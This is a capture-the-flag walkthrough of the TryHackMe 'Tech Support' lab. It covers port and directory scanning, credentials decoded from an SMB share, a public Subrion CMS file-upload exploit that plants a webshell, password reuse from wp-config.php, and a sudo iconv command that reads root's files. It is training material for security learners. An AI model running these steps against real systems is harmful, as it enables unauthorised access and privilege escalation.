Tech Support TryHackMe Walkthrough
In this article, I will be sharing a walkthrough of the Tech Support room from TryHackMe. This is an easy level boot2root challenge which includes exploiting a file upload vulnerability to get initial access and then exploiting the iconv sudo permission to read the root flag. Let's get started!
Challenge Link - https://tryhackme.com/room/techsupp0rt1
Initial Enumeration and Web Shell
We can start the initial enumeration by running a port scan using nmap to scan open ports and default scripts.
┌──(madhav㉿kali)-[~/ctf/thm/techSupport]
└─$ nmap -sC -sV -oN nmap/initial 10.10.59.1
Nmap scan report for 10.10.59.1
Host is up (0.19s latency).
Not shown: 996 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 10:8a:f5:72:d7:f9:7e:14:a5:c5:4f:9e:97:8b:3d:58 (RSA)
| 256 7f:10:f5:57:41:3c:71:db:b5:5b:db:75:c9:76:30:5c (ECDSA)
|_ 256 6b:4c:23:50:6f:36:00:7c:a6:7c:11:73:c1:a8:60:0c (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
Service Info: Host: TECHSUPPORT; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
| smb2-time:
| date: 2022-05-16T17:28:34
|_ start_date: N/A
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: techsupport
| NetBIOS computer name: TECHSUPPORT\x00
| Domain name: \x00
| FQDN: techsupport
|_ System time: 2022-05-21T22:58:36+05:30
|_clock-skew: mean: -1h49m59s, deviation: 3h10m29s, median: 0s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed May 16 22:58:43 2022 -- 1 IP address (1 host up) scanned in 47.35 seconds
We have a SSH server running on port 22, Apache httpd server running on port 80 and Samba smbd running on port 139 and 445.
Let's start by enumerating the port 80 first. Nmap scan shows that it is running the Apache2 Ubuntu Default Page. Let's open our web browser and check it out.
Next, we can run a gobuster scan to look for hidden files and directories.
┌──(madhav㉿kali)-[~/ctf/thm/techSupport]
└─$ gobuster dir -u http://10.10.59.1 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.59.1
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/wordpress (Status: 301) [Size: 312] [--> http://10.10.59.1/wordpress/]
/test (Status: 301) [Size: 307] [--> http://10.10.59.1/test/]
===============================================================
Finished
===============================================================
We got two directories, I enumerated both of them but there is nothing useful for us. This is a rabbit hole, just don't fall for this.
Next we can enumerate the SMB server and check if there is any share that we can read or write.
┌──(madhav㉿kali)-[~/ctf/thm/techSupport]
└─$ smbclient -L 10.10.59.1
Password for [WORKGROUP\madhav]:
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
websvr Disk
IPC$ IPC IPC Service (TechSupport server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.
Server Comment
--------- -------
Workgroup Master
--------- -------
WORKGROUP
We got a share named websvr
. Let's try connecting to it.
┌──(madhav㉿kali)-[~/ctf/thm/techSupport]
└─$ smbclient //10.10.59.1/websvr
Password for [WORKGROUP\madhav]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sat May 29 12:47:38 2021
.. D 0 Sat May 29 12:33:47 2021
enter.txt N 273 Sat May 29 12:47:38 2021
8460484 blocks of size 1024. 5698836 blocks available
smb: \> get enter.txt
getting file \enter.txt of size 273 as enter.txt (0.2 KiloBytes/sec) (average 0.2 KiloBytes/sec)
smb: \> exit
We got a file named enter.txt
. Inside the file, there are some credentials (which are encoded) and reference to a directory named /subrion
.
┌──(madhav㉿kali)-[~/ctf/thm/techSupport]
└─$ cat enter.txt
GOALS
=====
1)Make fake popup and host it online on Digital Ocean server
2)Fix subrion site, /subrion doesn't work, edit from panel
3)Edit wordpress website
IMP
===
Subrion creds
|->admin:7sKvntXdPEJaxazce9PXi24zaFrLiKWCk [cooked with magical formula]
Wordpress creds
|->
First of all, we need to decrypt the password. For this we can use CyberChef. This is a very easy encryption, it can be directly solved using CyberChef's magic function.
We got the password! If you try to access the /subrion
directory, the page does not load properly. But we can access the /subrion/panel
directory. This contains a login page, and we can login using the credentials we got earlier.
For those who don't know about subrion, it is an open source CMS based on PHP and MySQL. There are many exploits available publicly for this CMS including the exploit for Authenticated File Upload vulnerability.
We can use this exploit to get a reverse shell on the target machine.
┌──(madhav㉿kali)-[~/ctf/thm/techSupport]
└─$ python3 49876.py -u http://10.10.59.1/subrion/panel/ -l admin -p Scam2021
[+] SubrionCMS 4.2.1 - File Upload Bypass to RCE - CVE-2018-19422
[+] Trying to connect to: http://10.10.59.1/subrion/panel/
[+] Success!
[+] Got CSRF token: maQYr48N6TYYj96VUyXQnHJLa10YDXfBBE7C66Tk
[+] Trying to log in...
[+] Login Successful!
[+] Generating random name for Webshell...
[+] Generated webshell name: gbbogvvwtgreihg
[+] Trying to Upload Webshell..
[+] Upload Success... Webshell path: http://10.10.59.1/subrion/panel/uploads/gbbogvvwtgreihg.phar
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
You can also get this reverse shell manually, by uploading a php-reverse-shell with a .phar
extension to /subrion/panel/uploads
and then you can execute the reverse shell.
Privilege Escalation
Now we have an initial shell on the target machine. Our next task is to elevate our privileges and finally get a root shell on the machine. To escalate our privileges, I started enumerating the web directories, and I found a password in the wp-config.php
.
$ cat /var/www/html/wordpress/wp-config.php
We can use this password to login as user scamsite
(can be found from /etc/passwd) using SSH.
┌──(madhav㉿kali)-[~/ctf/thm/techSupport]
└─$ ssh scamsite@10.10.59.1
The authenticity of host '10.10.59.1 (10.10.59.1)' can't be established.
ED25519 key fingerprint is SHA256:J/HR9GKX4ReRvs4I9fnMwmJrOTL5B3skZ4owxwxWoyM.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.59.1' (ED25519) to the list of known hosts.
scamsite@10.10.59.1's password:
Welcome to Ubuntu 16.04.7 LTS (GNU/Linux 4.4.0-186-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
120 packages can be updated.
88 updates are security updates.
Last login: Fri May 28 23:30:20 2021
scamsite@TechSupport:~$
Now, if we run the sudo -l
command, we can see that the user scamsite can run the /usr/bin/iconv
command as user root.
scamsite@TechSupport:~$ sudo -l
Matching Defaults entries for scamsite on TechSupport:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User scamsite may run the following commands on TechSupport:
(ALL) NOPASSWD: /usr/bin/iconv
iconv
is a tool in linux which can be used to convert text from one encoding to another. You can read more about this tool from the linux man page. For GTFOBins, I found out that we can exploit the special permission given to this tool to read our root flag.
We can do this by the following command:
camsite@TechSupport:~$ sudo iconv -f 8859_1 -t 8859_1 "/root/root.txt"
**************************************** -
The challenge is now complete. We managed to read the root flag! That’s it! Thanks for reading. Stay tuned for similar walkthroughs and much more coming up in the near future!
NOTE: The awesome artwork used in this article was created by Alfrey Davilla | vaneltia.